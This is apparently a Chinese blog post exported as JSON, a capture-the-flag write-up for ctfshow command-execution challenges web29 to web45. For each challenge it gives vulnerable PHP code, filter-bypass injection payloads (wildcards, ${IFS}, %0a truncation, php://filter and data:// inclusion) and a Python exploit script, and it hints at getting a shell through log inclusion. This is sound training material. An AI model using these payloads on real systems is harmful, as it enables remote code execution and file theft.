{"id":267,"date":"2022-09-08T14:19:42","date_gmt":"2022-09-08T06:19:42","guid":{"rendered":"http:\/\/162.14.82.114\/?p=267"},"modified":"2022-09-14T01:06:15","modified_gmt":"2022-09-13T17:06:15","slug":"web%e5%85%a5%e9%97%a8-%e5%91%bd%e4%bb%a4%e6%89%a7%e8%a1%8c%ef%bc%88%e4%b8%80%ef%bc%89","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/267\/09\/08\/2022\/","title":{"rendered":"WEB\u5165\u95e8\u2014\u2014\u547d\u4ee4\u6267\u884c\uff08\u4e00\uff09"},"content":{"rendered":"

\"VeryCapture_20220914010245\"<\/div><\/p>\n

web29<\/h1>\n
\u547d\u4ee4\u6267\u884c\uff0c\u9700\u8981\u4e25\u683c\u7684\u8fc7\u6ee4<\/code><\/pre>\n
<?php\nerror_reporting(0);\nif(isset($_GET['c'])){\n    $c = $_GET['c'];\n    if(!preg_match("\/flag\/i", $c)){\n        eval($c);\n    }\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
preg_match()<\/code>\u51fd\u6570\u7528\u4e8e\u6267\u884c\u4e00\u4e2a\u6b63\u5219\u8868\u8fbe\u5f0f\u5339\u914d\u3002\/i<\/code>\u610f\u5473\u7740\u4e0d\u5206\u5927\u5c0f\u5199\u3002\u672c\u53e5\u542b\u4e49\u662f\u4e0d\u80fd\u7528flag<\/code>\u503c\u4e14\u5ffd\u7565\u4e86\u5927\u5c0f\u5199\u3002<\/p>\n
\u65b9\u6cd5\u4e00\uff1a\u901a\u914d\u7b26<\/h2>\n
\u6211\u9996\u5148\u5c31\u60f3\u5230\u76f4\u63a5\u4f7f\u7528\u901a\u914d\u7b26\u6784\u9020 <\/p>\n
\/?c=echo system('cat f*');\n#\u6216\u8005\/?c=system('nl fl?ag.php');<\/code><\/pre>\n
\u4ec0\u4e48\u90fd\u770b\u4e0d\u5230\u6ca1\u5173\u7cfb\uff0c\u6253\u5f00\u6e90\u4ee3\u7801\u5c31\u770b\u5230\u4e86\uff01<\/p>\n
$flag = 'ctfshow{36e9edd3-f9b6-44c2-ab26-73fcc32e981b}';<\/code><\/pre>\n
#hint\u7ed9\u51fa\u7684payload:\n\/?c=system('nl fl?g.php');<\/code><\/pre>\n
\n
nl\u662fLinux\u7cfb\u7edf\u547d\u4ee4\uff0c\u529f\u80fd\u548ccat\u4e00\u6837\uff0c\u4f46\u662f\u80fd\u989d\u5916\u663e\u793a\u884c\u53f7\uff1b<\/p>\n<\/blockquote>\n
\u65b9\u6cd5\u4e8c\uff1a\u8f93\u51fa\u5230\u6587\u4ef6<\/h2>\n
\/?c=phpinfo(); #\u8f93\u51fa\u7248\u672c\u53f7\uff0c\u67e5\u770bdisable_functions\n\/?c=print_r(scandir("."));\n\/?c=system("cat *php >>1.txt"); #\u8f93\u51fa\u52301.txt\u6587\u4ef6\n\/1.txt<\/code><\/pre>\n
\u65b9\u6cd5\u4e09\uff1aPOST\u4f20\u53c2<\/h2>\n
\"image-20220530002236881\"<\/div><\/p>\n
\u65b9\u6cd5\u56db\uff1aeval()+include\u7ed3\u5408\u4f2a\u534f\u8bae\u8fdb\u884c\u5305\u542b\u8bfb\u53d6<\/h2>\n
\u4f20\u5165\uff1a==?c=echo ''?><?php system('ls');==<\/p>\n
\u53ef\u4ee5\u770b\u5230\u6709 flag.php\u6587\u4ef6,\u4e4b\u540e\u91c7\u7528include\u7ed3\u5408\u4f2a\u534f\u8bae\u8fdb\u884c\u5305\u542b\u8bfb\u53d6\uff1a<\/p>\n
payload\uff1a\/?c=echo ''?><?php include"$_GET[url]";&url=php:\/\/filter\/read=convert.base64-encode\/resource=flag.php<\/code><\/pre>\n
\u65b9\u6cd5\u4e94\uff1a\u53cd\u5f15\u53f7\u5999\u7528<\/h2>\n
payload\uff1a\/?c=system("cat fl``ag.php");<\/code><\/pre>\n
\u80fd\u591f\u4ee3\u66ffcat\u7684\u8fd8\u6709\uff1atac|more|less|curl|nl|tail|sort|strings<\/code><\/h2>\n
web30<\/h1>\n
\u547d\u4ee4\u6267\u884c\uff0c\u9700\u8981\u4e25\u683c\u7684\u8fc7\u6ee4 <!--\u5b9e\u9645\u4e0a\u5230web56\u90fd\u662f\u8fd9\u53e5\u8bdd--><\/code><\/pre>\n
<?php\nerror_reporting(0);\nif(isset($_GET['c'])){\n    $c = $_GET['c'];\n    if(!preg_match("\/flag|system|php\/i", $c)){\n        eval($c);\n    }\n\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
\u53ef\u4ee5\u770b\u5230\u8fc7\u6ee4\u4e86flag<\/code>\u3001system<\/code>\u548cphp<\/code>\uff0c\u4e14\u5927\u5c0f\u5199\u65e0\u6cd5\u7ed5\u8fc7\uff1a<\/p>\n
\u65b9\u6cd5\u4e00\uff1a\u901a\u914d\u7b26\u7ed5\u8fc7+\u7cfb\u7edf\u6267\u884c<\/h2>\n
\u672c\u9898\u4f9d\u7136\u53ef\u4ee5\u4f7f\u7528\u4e0a\u9762\u7684\u65b9\u6cd5\u8fd9\u91cc\u6784\u9020\u4e00\u4e2a payload\uff1a(\u53cd\u5f15\u53f7\u6267\u884c\u7cfb\u7edf\u547d\u4ee4)<\/p>\n
payload:\/?c=echo `cat f*`;\n#\u6216\u8005 \/?c=echo`cat ????.??? >> 1.txt`;<\/code><\/pre>\n
\u5f97\u5230 flag\uff1a==ctfshow{40bbd3f1-e879-4486-8aac-6770d013e050}==<\/p>\n
\u65b9\u6cd5\u4e8c\uff1aeval()+include\u7ed3\u5408\u4f2a\u534f\u8bae\u8fdb\u884c\u5305\u542b\u8bfb\u53d6<\/h2>\n
\/?c=include"$_GET[url]"?>&url=php:\/\/filter\/read=convert.base64-encode\/resource=flag.php<\/code><\/pre>\n
\u8fd9\u4e2a\u529e\u6cd5\u6211\u611f\u89c9\u6ca1\u6709\u4e0a\u9762\u7684\u4f18\u96c5\uff0c\u4f46\u662f\u638c\u63e1\u603b\u662f\u597d\u7684\uff0c\u4e07\u4e00\u4ee5\u540e\u7528\u5f97\u4e0a\u5462\uff01\uff01<\/p>\n
\u65b9\u6cd5\u4e09\uff1ahint\uff1a\u7528''\u9694\u65ad\u5b57\u7b26<\/h2>\n
echo `nl fl''ag.p''hp`;<\/code><\/pre>\n
POST\u4f20\u53c2\u4e5f\u53ef\u4ee5\uff0c\u540cweb29<\/h2>\n
web31<\/h1>\n
<?php\nerror_reporting(0);\nif(isset($_GET['c'])){\n    $c = $_GET['c'];\n    if(!preg_match("\/flag|system|php|cat|sort|shell|\\.| |\\'\/i", $c)){\n        eval($c);\n    }\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
\u8fc7\u6ee4\u4e86flag<\/code>,system<\/code>,php<\/code>,cat<\/code>,sort<\/code>,shell<\/code>,\u7a7a\u683c<\/code>\uff0c\u5355\u5f15\u53f7'<\/code>\u8fd8\u6709\u53e5\u53f7.<\/code>\u56de\u5934\u603b\u7ed3\u4e0b\u8fd9\u65b9\u9762\u7684\u3002<\/p>\n
\u7a7a\u683c\u8fc7\u6ee4\uff1a<\/p>\n
%09 \u7b26\u53f7\u9700\u8981php\u73af\u5883\n{cat,flag.txt} \ncat${IFS}flag.txt\ncat$IFS$9flag.txt\ncat<flag.txt\ncat<>flag.txt\nkg=$'\\x20flag.txt'&&cat$kg\n(\\x20\u8f6c\u6362\u6210\u5b57\u7b26\u4e32\u5c31\u662f\u7a7a\u683c\uff0c\u8fd9\u91cc\u901a\u8fc7\u53d8\u91cf\u7684\u65b9\u5f0f\u5de7\u5999\u7ed5\u8fc7)<\/code><\/pre>\n
cat\u8fc7\u6ee4\uff1a<\/p>\n
more:\u4e00\u9875\u4e00\u9875\u7684\u663e\u793a\u6863\u6848\u5185\u5bb9\nless:\u4e0e more \u7c7b\u4f3c\u3002\u4f46\u5728\u7528 more \u65f6\u5019\u53ef\u80fd\u4e0d\u80fd\u5411\u4e0a\u7ffb\u9875\uff0c\u4e0d\u80fd\u5411\u4e0a\u641c\u7d22\u6307\u5b9a\u5b57\u7b26\u4e32\uff0c\u800c less \u5374\u53ef\u4ee5\u81ea\u7531\u7684\u5411\u4e0a\u5411\u4e0b\u7ffb\u9875\uff0c\u4e5f\u53ef\u4ee5\u81ea\u7531\u7684\u5411\u4e0a\u5411\u4e0b\u641c\u7d22\u6307\u5b9a\u5b57\u7b26\u4e32\u3002\nhead:\u67e5\u770b\u5934\u51e0\u884c\ntac:\u4ece\u6700\u540e\u4e00\u884c\u5f00\u59cb\u663e\u793a\uff0c\u53ef\u4ee5\u770b\u51fa tac \u662f cat \u7684\u53cd\u5411\u663e\u793a\ntail:\u67e5\u770b\u5c3e\u51e0\u884c\nnl\uff1a\u547d\u4ee4\u7684\u4f5c\u7528\u548c cat -n \u7c7b\u4f3c\uff0c\u662f\u5c06\u6587\u4ef6\u5185\u5bb9\u5168\u90e8\u663e\u793a\u5728\u5c4f\u5e55\u4e0a\uff0c\u5e76\u4e14\u662f\u4ece\u7b2c\u4e00\u884c\u5f00\u59cb\u663e\u793a\uff0c\u540c\u65f6\u4f1a\u81ea\u52a8\u6253\u5370\u51fa\u884c\u53f7\u3002\nod:\u4ee5\u4e8c\u8fdb\u5236\u7684\u65b9\u5f0f\u8bfb\u53d6\u6863\u6848\u5185\u5bb9\nvi:\u4e00\u79cd\u7f16\u8f91\u5668\uff0c\u8fd9\u4e2a\u4e5f\u53ef\u4ee5\u67e5\u770b\nvim:\u4e00\u79cd\u7f16\u8f91\u5668\uff0c\u8fd9\u4e2a\u4e5f\u53ef\u4ee5\u67e5\u770b\nsort:\u53ef\u4ee5\u67e5\u770b\nuniq:\u53ef\u4ee5\u67e5\u770b\nfile -f:\u62a5\u9519\u51fa\u5177\u4f53\u5185\u5bb9\u3002\u53ef\u4ee5\u5229\u7528\u62a5\u9519\u5c06\u6587\u4ef6\u5185\u5bb9\u5e26\u51fa\u6765\uff08-f<\u540d\u79f0\u6587\u4ef6> \u3000\u6307\u5b9a\u540d\u79f0\u6587\u4ef6\uff0c\u5176\u5185\u5bb9\u6709\u4e00\u4e2a\u6216\u591a\u4e2a\u6587\u4ef6\u540d\u79f0\u65f6\uff0c\u8ba9file\u4f9d\u5e8f\u8fa8\u8bc6\u8fd9\u4e9b\u6587\u4ef6\uff0c\u683c\u5f0f\u4e3a\u6bcf\u5217\u4e00\u4e2a\u6587\u4ef6\u540d\u79f0\u3002\uff09<\/code><\/pre>\n
\u89e3\u6cd5\u4e00\uff1a\u76f4\u63a5\u4f7f\u7528\u5bf9\u5e94\u7684\u7ed5\u8fc7\u65b9\u6cd5<\/h2>\n
\/?c=echo(`tac%09f*`);<\/code><\/pre>\n
\u89e3\u6cd5\u4e8c\uff1ainclude\u7ed3\u5408\u4f2a\u534f\u8bae\u8fdb\u884c\u5305\u542b\u8bfb\u53d6<\/h2>\n
\/?c=include"$_GET[url]"?>&url=php:\/\/filter\/read=convert.base64-encode\/resource=flag.php<\/code><\/pre>\n
web32<\/h1>\n
<?php\nerror_reporting(0);\nif(isset($_GET['c'])){\n    $c = $_GET['c'];\n    if(!preg_match("\/flag|system|php|cat|sort|shell|\\.| |\\'|\\`|echo|\\;|\\(\/i", $c)){\n        eval($c);\n    }\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
\u8fc7\u6ee4\u4e86flag<\/code>,system<\/code>,php<\/code>,cat<\/code>,sort<\/code>,shell<\/code>,echo<\/code>,\u5206\u53f7<\/code>\uff0c\u7a7a\u683c<\/code>\uff0c\u5355\u5f15\u53f7<\/code>\uff0c\u62ec\u53f7<\/code>\uff0c\u53cd\u5f15\u53f7<\/code>\uff0c.<\/code>\u7b49<\/p>\n
\u4f7f\u7528php\u4f2a\u534f\u8bae\u8fdb\u884c\u5305\u542b\uff1a<\/p>\n
\/?c=include"$_GET[hack]"?>&hack=php:\/\/filter\/read=convert.base64-encode\/resource=flag.php<\/code><\/pre>\n
\"image-20220603165144298\"<\/div><\/p>\n
web33<\/h1>\n
<?php\nerror_reporting(0);\nif(isset($_GET['c'])){\n    $c = $_GET['c'];\n    if(!preg_match("\/flag|system|php|cat|sort|shell|\\.| |\\'|\\`|echo|\\;|\\(|\\"\/i", $c)){\n        eval($c);\n    }   \n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
\u8fc7\u6ee4\u4e86\u5355\u53cc\u5f15\u53f7\uff0c\u76f4\u63a5\u7528\u6570\u7ec4\u4f5c\u4e3a\u53c2\u6570\u5373\u53ef\u7ed5\u8fc7\u3002<\/p>\n
\/?c=include$_GET[1]?>&1=php:\/\/filter\/read=convert.base64-encode\/resource=flag.php<\/code><\/pre>\n
Hint<\/h2>\n
\/?c=?><?=include$_GET[1]?>&1=php:\/\/filter\/read=convert.base64-encode\/resource=flag.php<\/code><\/pre>\n
web34<\/h1>\n
<?php\nerror_reporting(0);\nif(isset($_GET['c'])){\n    $c = $_GET['c'];\n    if(!preg_match("\/flag|system|php|cat|sort|shell|\\.| |\\'|\\`|echo|\\;|\\(|\\:|\\"\/i", $c)){\n        eval($c);\n    }    \n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
\u628a\u5192\u53f7\u7ed9\u7981\u6389\u4e86\uff0c\u4e0d\u8fc7\u4e0d\u5f71\u54cd\uff0c\u548c\u4e0a\u9762\u4e00\u6478\u4e00\u6837\uff1a<\/p>\n
c=include$_GET[1]?>&1=php:\/\/filter\/read=convert.base64-encode\/resource=flag.php<\/code><\/pre>\n
web35<\/h1>\n
<?php\nerror_reporting(0);\nif(isset($_GET['c'])){\n    $c = $_GET['c'];\n    if(!preg_match("\/flag|system|php|cat|sort|shell|\\.| |\\'|\\`|echo|\\;|\\(|\\:|\\"|\\<|\\=\/i", $c)){\n        eval($c);\n    }    \n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
\u591a\u8fc7\u6ee4\u4e86\u4e00\u4e2a<\u7b26\u53f7\uff0c\u65e0\u59a8\u7ee7\u7eed\uff1a<\/p>\n
\/?c=include$_GET[1]?>&1=php:\/\/filter\/read=convert.base64-encode\/resource=flag.php<\/code><\/pre>\n
web36<\/h1>\n
<?php\nerror_reporting(0);\nif(isset($_GET['c'])){\n    $c = $_GET['c'];\n    if(!preg_match("\/flag|system|php|cat|sort|shell|\\.| |\\'|\\`|echo|\\;|\\(|\\:|\\"|\\<|\\=|\\\/|[0-9]\/i", $c)){\n        eval($c);\n    }   \n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
\u53c8\u8fc7\u6ee4\u6389\u4e86\u6570\u5b57\uff0c\u5c06\u6570\u5b571<\/code>\u6539\u6210\u5b57\u6bcd\u5c31\u884c\u4e86\uff01\uff01\uff01<\/p>\n
\/?c=include$_GET[hack]?>&hack=php:\/\/filter\/read=convert.base64-encode\/resource=flag.php<\/code><\/pre>\n
web37<\/h1>\n
<?php\n\/\/flag in flag.php\nerror_reporting(0);\nif(isset($_GET['c'])){\n    $c = $_GET['c'];\n    if(!preg_match("\/flag\/i", $c)){\n        include($c);\n        echo $flag; \n    }       \n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
include \u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u5229\u7528 data \u4f2a\u534f\u8bae\u6765\u8bfb\u53d6 flag\uff1a<\/p>\n
\n
data:\/\/<\/code>\u53ef\u4ee5\u8ba9\u7528\u6237\u6765\u63a7\u5236\u8f93\u5165\u6d41\uff0c\u5f53\u5b83\u4e0e\u5305\u542b\u51fd\u6570\u7ed3\u5408\u65f6\uff0c\u7528\u6237\u8f93\u5165\u7684data:\/\/\u6d41\u4f1a\u88ab\u5f53\u4f5cphp\u6587\u4ef6\u6267\u884c<\/p>\n<\/blockquote>\n
\/?c=data:\/\/text\/plain,<?php system("cat f*");<\/code><\/pre>\n
\u7136\u540e\u67e5\u770b\u7f51\u9875\u6e90\u4ee3\u7801\u5373\u53ef\uff01<\/p>\n
Hint<\/h2>\n
data:\/\/text\/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs\/Pg==\ndata:\/\/text\/plain;base64,<?php system('cat flag.php');?>\n\u67e5\u770b\u6e90\u4ee3\u7801 \u6216\u8005\u901a\u8fc7\u5305\u542b\u65e5\u5fd7\u6587\u4ef6\u62ffshell<\/code><\/pre>\n
web38<\/h1>\n
<?php\n    \/\/flag in flag.php\n    error_reporting(0);\nif(isset($_GET['c'])){\n    $c = $_GET['c'];\n    if(!preg_match("\/flag|php|file\/i", $c)){\n        include($c);\n        echo $flag;\n    }\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
\u6587\u4ef6\u5305\u542b\uff0c\u7528\u4e0a\u9762\u7684\u5c31\u884c\u4f46\u662f\u8fc7\u6ee4\u6389\u4e86php\uff0c\u4f7f\u7528base\u7f16\u7801\u7ed5\u8fc7\uff1a<\/p>\n
# \/?c=data:\/\/text\/plain;<?php system("cat f*");\n\/?c=data:\/\/text\/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZionKTs=<\/code><\/pre>\n
\u67e5\u770b\u6e90\u4ee3\u7801\uff0c\u5f97\u5230flag\uff01<\/p>\n
Hint<\/h2>\n
nginx\u7684\u65e5\u5fd7\u6587\u4ef6\/var\/log\/nginx\/access.log\ndata:\/\/text\/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs\/Pg==\n\u67e5\u770b\u6e90\u4ee3\u7801 \u6216\u8005\u901a\u8fc7\u5305\u542b\u65e5\u5fd7\u6587\u4ef6\u62ffshell<\/code><\/pre>\n
web39<\/h1>\n
<?php\n    \/\/flag in flag.php\n    error_reporting(0);\nif(isset($_GET['c'])){\n    $c = $_GET['c'];\n    if(!preg_match("\/flag\/i", $c)){\n        include($c.".php");\n    }\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
\u867d\u7136\u8fd9\u91cc\u9650\u5236\u4e86\u540e\u7f00\uff0c\u4f46\u662f\u5bf9\u6211\u4eec\u5e76\u4e0d\u5f71\u54cd\uff0c\u56e0\u4e3a\u6211\u4eec\u5c06 php \u8bed\u53e5\u95ed\u5408\u4e86\u4ee5\u540e\uff0c\u62fc\u63a5\u7684.php<\/code>\u5c31\u4ee5\u6587\u672c\u5f62\u5f0f\u663e\u793a\u3002<\/p>\n
\/?c=data:\/\/text\/plain,<?php system("cat f*")?><\/code><\/pre>\n
Hint<\/h2>\n
data:\/\/text\/plain, \u8fd9\u6837\u5c31\u76f8\u5f53\u4e8e\u6267\u884c\u4e86php\u8bed\u53e5 .php \u56e0\u4e3a\u524d\u9762\u7684php\u8bed\u53e5\u5df2\u7ecf\u95ed\u5408\u4e86\uff0c\u6240\u4ee5\u540e\u9762\u7684.php\u4f1a\u88ab\u5f53\u6210html\u9875\u9762\u76f4\u63a5\u663e\u793a\u5728\u9875\u9762\u4e0a\uff0c\u8d77\u4e0d\u5230\u4ec0\u4e48\u4f5c\u7528<\/code><\/pre>\n
web40<\/h1>\n
<?php\n    if(isset($_GET['c'])){\n        $c = $_GET['c'];\n        if(!preg_match("\/[0-9]|\\~|\\`|\\@|\\#|\\\\$|\\%|\\^|\\&|\\*|\\\uff08|\\\uff09|\\-|\\=|\\+|\\{|\\[|\\]|\\}|\\:|\\'|\\"|\\,|\\<|\\.|\\>|\\\/|\\?|\\\\\\\\\/i", $c)){\n            eval($c);\n        }\n    }else{\n        highlight_file(__FILE__);\n    }<\/code><\/pre>\n
\u53ef\u4ee5\u770b\u5230\u51e0\u4e4e\u5168\u90e8\u7684\u7b26\u53f7\u90fd\u88ab\u8fc7\u6ee4\u4e86\uff0c\u6211\u53ea\u80fd\u770b\u5230(<\/code>\u548c)<\/code>\u4f3c\u4e4e\u6ca1\u8fc7\u6ee4\uff0c\u4f46\u662f\u786e\u5b9e\u4e0d\u77e5\u9053\u600e\u4e48\u505a\uff0c\u770b\u4e00\u4e0b\u63d0\u793a\uff1a<\/p>\n
\u4f7f\u7528\u7684\u662f\u65e0\u53c2\u6570\u51fd\u6570\uff0c\u5148\u53bb\u4e86\u89e3\u4e00\u4e0b\u8fd9\u4e2a\u662f\u5565\uff1a<\/p>\n
\"\u65e0\u53c2\u6570\u51fd\u6570\"<\/div><\/p>\n
\u5148\u6253\u5370\u76ee\u5f55\u6587\u4ef6<\/h2>\n
print_r(scandir(current(localeconv())))<\/code><\/pre>\n
Array ( [0] => . [1] => .. [2] => flag.php [3] => index.php )<\/code><\/pre>\n
next(array_reverse())\u5f97\u5230flag<\/h2>\n
show_source(next(array_reverse(scandir(current(localeconv())))));<\/code><\/pre>\n
\u5f97\u5230flag\u3002<\/p>\n
Hint<\/h2>\n
show_source(next(array_reverse(scandir(pos(localeconv())))));<\/code><\/pre>\n
web41<\/h1>\n
<?php\n    if(isset($_POST['c'])){\n        $c = $_POST['c'];\n        if(!preg_match('\/[0-9]|[a-z]|\\^|\\+|\\~|\\$|\\[|\\]|\\{|\\}|\\&|\\-\/i', $c)){\n            eval("echo($c);");\n        }\n    }else{\n        highlight_file(__FILE__);\n    }\n?><\/code><\/pre>\n
\u8fc7\u6ee4\u4e86\u5b57\u7b26\u4e32\u3001\u6570\u5b57\u8fd8\u6709\u5f88\u591a\u7684\u7b26\u53f7\uff0c\u4f46\u662f\u6ca1\u6709\u8fc7\u6ee4|<\/code>,'<\/code>\u7b49\u7b26\u53f7\uff0c\u5148\u4f7f\u7528\u811a\u672c\u67e5\u770b\u4e00\u4e0bascii\u5b57\u7b26\u4e2d\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u7684\u5b57\u7b26\uff0c\u8fd9\u91cc\u76f4\u63a5\u4f7f\u7528\u7fbd\u5e08\u5085\u7684\u811a\u672c\uff1a<\/p>\n
<?php\n    $myfile = fopen("rce_or.txt", "w");\n$contents="";\nfor ($i=0; $i < 256; $i++) { \n    for ($j=0; $j <256 ; $j++) { \n\n        if($i<16){\n            $hex_i='0'.dechex($i);\n        }\n        else{\n            $hex_i=dechex($i);\n        }\n        if($j<16){\n            $hex_j='0'.dechex($j);\n        }\n        else{\n            $hex_j=dechex($j);\n        }\n        $preg = '\/[0-9]|[a-z]|\\^|\\+|\\~|\\$|\\[|\\]|\\{|\\}|\\&|\\-\/i';\n        if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){\n            echo "";\n        }\n\n        else{\n            $a='%'.$hex_i;\n            $b='%'.$hex_j;\n            $c=(urldecode($a)|urldecode($b));\n            if (ord($c)>=32&ord($c)<=126) {\n                $contents=$contents.$c." ".$a." ".$b."\\n";\n            }\n        }\n\n    }\n}\nfwrite($myfile,$contents);\nfclose($myfile);<\/code><\/pre>\n
\u8fd0\u884c\u5b8c\u811a\u672c\u4f1a\u81ea\u52a8\u751f\u6210\u4e00\u4e2a\u6587\u4ef6rce_or.txt<\/code>\uff0c\u91cc\u9762\u6709\u53ef\u4ee5\u4f7f\u7528\u7684\u5b57\u7b26\u4e32<\/p>\n
\n    
\"image-20220912170850515\"<\/div>\n<\/div>\n
\u5229\u7528\u8fd9\u4e9b\u5b57\u7b26\u4e32\u6784\u9020payload\u5c31\u884c\u4e86\uff0c\u6bd4\u8f83\u9ebb\u70e6\uff0c\u8fd9\u91cc\u4f7f\u7528yu\u5e08\u5085\u7684\u811a\u672c<\/p>\n
# -*- coding: utf-8 -*-\nimport requests\nimport urllib\nfrom sys import *\nimport os\nos.system("php rce_or.php")  #\u6ca1\u6709\u5c06php\u5199\u5165\u73af\u5883\u53d8\u91cf\u9700\u624b\u52a8\u8fd0\u884c\nif(len(argv)!=2):\n   print("="*50)\n   print('USER\uff1apython exp.py <url>')\n   print("eg\uff1a  python exp.py http:\/\/ctf.show\/")\n   print("="*50)\n   exit(0)\nurl=argv[1]\ndef action(arg):\n   s1=""\n   s2=""\n   for i in arg:\n       f=open("rce_or.txt","r")\n       while True:\n           t=f.readline()\n           if t=="":\n               break\n           if t[0]==i:\n               #print(i)\n               s1+=t[2:5]\n               s2+=t[6:9]\n               break\n       f.close()\n   output="(\\""+s1+"\\"|\\""+s2+"\\")"\n   return(output)\n\nwhile True:\n   param=action(input("\\n[+] your function\uff1a") )+action(input("[+] your command\uff1a"))\n   data={\n       'c':urllib.parse.unquote(param)\n       }\n   r=requests.post(url,data=data)\n   print("\\n[*] result:\\n"+r.text)<\/code><\/pre>\n
\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ mkdir temp                                       \n\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ cd tmep   \ncd: no such file or directory: tmep\n\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ cd temp\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp]\n\u2514\u2500$ vim rce_or.php           \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp]\n\u2514\u2500$ vim exp.py    \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp]\n\u2514\u2500$ python exp.py http:\/\/4836d409-74ea-4387-8389-9def83e6e7db.challenge.ctf.show\/\n\n[+] your function\uff1asystem\n[+] your command\uff1als\n\n[*] result:\nflag.php\nindex.php\nindex.php\n\n[+] your function\uff1asystem\n[+] your command\uff1acat flag.php\n\n[*] result:\n<?php\n\n\/*\n# -*- coding: utf-8 -*-\n# @Author: \u7fbd\n# @Date:   2020-09-05 20:31:22\n# @Last Modified by:   h1xa\n# @Last Modified time: 2020-09-05 20:33:10\n# @email: 1341963450@qq.com\n# @link: https:\/\/ctf.show\n*\/\n$flag="ctfshow{378670d5-a7aa-4bf4-8bec-eca4a51c83c5}";<\/code><\/pre>\n
web42<\/h1>\n
<?php\nif(isset($_GET['c'])){\n    $c=$_GET['c'];\n    system($c." >\/dev\/null 2>&1");\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
\u5c06\u6807\u51c6\u8f93\u51fa\u548c\u6807\u51c6\u8f93\u5165\u90fd\u6254\u5230\u5230\/dev\/null\u4e2d<\/p>\n
\u91cd\u5b9a\u5411\u7b26\u53f7<\/strong><\/p>\n
    \n
  • 0\u8868\u793a\u952e\u76d8\u8f93\u5165<\/li>\n
  • 1\u8868\u793a\u5c4f\u5e55\u8f93\u51fa<\/li>\n
  • 2\u8868\u793a\u9519\u8bef\u8f93\u51fa<\/li>\n<\/ul>\n
    2>&1<\/code> \u610f\u601d\u662f\u628a\u6807\u51c6\u9519\u8bef\u8f93\u51fa\u91cd\u5b9a\u5411\u5230\u6807\u51c6\u8f93\u51fa\uff0c\u610f\u601d\u662f\u628a\u6807\u51c6\u8f93\u51fa\u548c\u6807\u51c6\u9519\u8bef\u8f93\u51fa\u90fd\u91cd\u5b9a\u5411\u5230\u540c\u4e00\u6587\u4ef6\u4e2d\u3002<\/p>\n
    \u4e3a\u4e86\u4e0d\u8ba9\u540e\u9762\u7684\u4ee3\u7801\u751f\u6548\uff0c\u9700\u8981\u622a\u65ad\u547d\u4ee4\uff0c\u4f7f\u7528'<\/code>\u3001,<\/code>\u3001;<\/code> %0a<\/code>\u3001%26<\/code>\u3001|<\/code>\u7b49\u90fd\u53ef\u4ee5\u3002<\/p>\n
    payload:\/?c=cat flag.php;<\/code><\/pre>\n
    Hint<\/h2>\n
    cat flag.php%0a \u67e5\u770b\u6e90\u4ee3\u7801<\/code><\/pre>\n
    web43<\/h1>\n
    <?php\nif(isset($_GET['c'])){\n    $c=$_GET['c'];\n    if(!preg_match("\/\\;|cat\/i", $c)){\n        system($c." >\/dev\/null 2>&1");\n    }\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
    \u8fd8\u662f\u91cd\u5b9a\u5411\uff0c\u8fc7\u6ee4\u4e86;<\/code>\u548ccat<\/code><\/p>\n
    payload:\/?c=tac f*%0a<\/code><\/pre>\n
    $flag="ctfshow{97ebb602-c1e4-435e-a416-d389c47f9d3a}"; *\/ # @link: https:\/\/ctfer.com # @email: h1xa@ctfer.com # @Last Modified time: 2020-09-05 20:49:53 # @Last Modified by: h1xa # @Date: 2020-09-05 20:49:44 # @Author: h1xa # -*- coding: utf-8 -*- \/*<\/code><\/pre>\n
    Hint<\/h2>\n
    nl flag.php%0a \u67e5\u770b\u6e90\u4ee3\u7801<\/code><\/pre>\n
    web44<\/h1>\n
    <?php\nif(isset($_GET['c'])){\n    $c=$_GET['c'];\n    if(!preg_match("\/;|cat|flag\/i", $c)){\n        system($c." >\/dev\/null 2>&1");\n    }\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
    \u53c8\u8fc7\u6ee4\u4e86flag<\/code>\uff0c\u4f46\u662f\u6beb\u65e0\u5f71\u54cd\uff0c\u7ee7\u7eed\uff1a<\/p>\n
    payload:\/?c=tac f*%0a<\/code><\/pre>\n
    Hint<\/h2>\n
    nl fla*.php%0a \u67e5\u770b\u6e90\u4ee3\u7801<\/code><\/pre>\n
    web45<\/h1>\n
    <?php\nif(isset($_GET['c'])){\n    $c=$_GET['c'];\n    if(!preg_match("\/\\;|cat|flag| \/i", $c)){\n        system($c." >\/dev\/null 2>&1");\n    }\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
    \u628a\u7a7a\u683c\u8fc7\u6ee4\u6389\u4e86:<\/p>\n
    payload:\/?c=tac%09f*%0a<\/code><\/pre>\n
    $flag="ctfshow{6d550ade-7201-4faf-a438-f7bd1c276f94}"; *\/ # @link: https:\/\/ctfer.com # @email: h1xa@ctfer.com # @Last Modified time: 2020-09-05 20:49:53 # @Last Modified by: h1xa # @Date: 2020-09-05 20:49:44 # @Author: h1xa # -*- coding: utf-8 -*- \/*<\/code><\/pre>\n
    \n
